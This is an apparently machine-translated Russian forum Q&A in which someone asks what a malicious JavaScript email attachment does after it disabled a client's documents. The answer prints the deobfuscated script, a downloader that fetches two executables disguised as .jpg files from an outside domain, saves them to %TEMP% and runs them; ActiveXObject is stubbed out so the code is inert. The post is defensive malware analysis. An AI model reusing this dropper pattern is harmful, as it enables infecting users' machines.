Нужна помощь в выяснении того, что делает этот Js

Question

Если кто-нибудь знает, что происходит в этом файле сценария java, не могли бы вы рассказать мне? Клиент нашего получил это как электронную почту и хорошо ... Теперь она не может открыть какие-либо документы или электронные таблицы. Также похоже, что он распространяется на остальную часть сети.

Если кто-то может помочь мне разобраться в этом, я был бы очень благодарен.

Я удалил его, а не то, что я хочу, чтобы кто-то еще смог овладеть.

Возможно, мне не нужно никому говорить, но , пожалуйста, не открывайте его, если он не находится в песочнице. Я не несу ответственность за то, что вы кирпич ваш ПК.

Источник: PM меня для файла, а ..

Answer 1

В основном, это скачивание вируса в папку темпа и выполнение его ...

Вы должны запустить антивирусную проверку по всей сети.

var AxProxy = function() {}; 

(function() { 
    function fFh(fr, Klw, rn) { 
     var VeZ = new AxProxy('WScript.Shell'); 
     var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw; 
     var OG4 = new AxProxy('MSXML2.XMLHTTP'); 

     OG4['onReadyStateChange'] = function() { 
      if (OG4['readyState'] === 4) { 
       var g38 = new AxProxy('ADODB.Stream'); 

       g38['open'](); 
       g38['type'] = 1; 
       g38['write'](OG4['ResponseBody']); 
       g38['position'] = 0; 
       g38['saveToFile'](Klw, 2); 
       g38['close'](); 
      } 
     }; 

     try { 
      OG4['open']('GET', fr, false); 
      OG4['send'](); 

      if (rn > 0) { 
       VeZ['Run'](Klw, 0, 0); 
      } 
     } catch (er) {}; 
    } 

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1); 
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1); 
}(); 

Все остальные переменные - это просто тарабарщина, предназначенная для путаницы и обескуражения декодирования.

_{PS: Я проксированном ActiveXObject так что это не может быть запущен ...}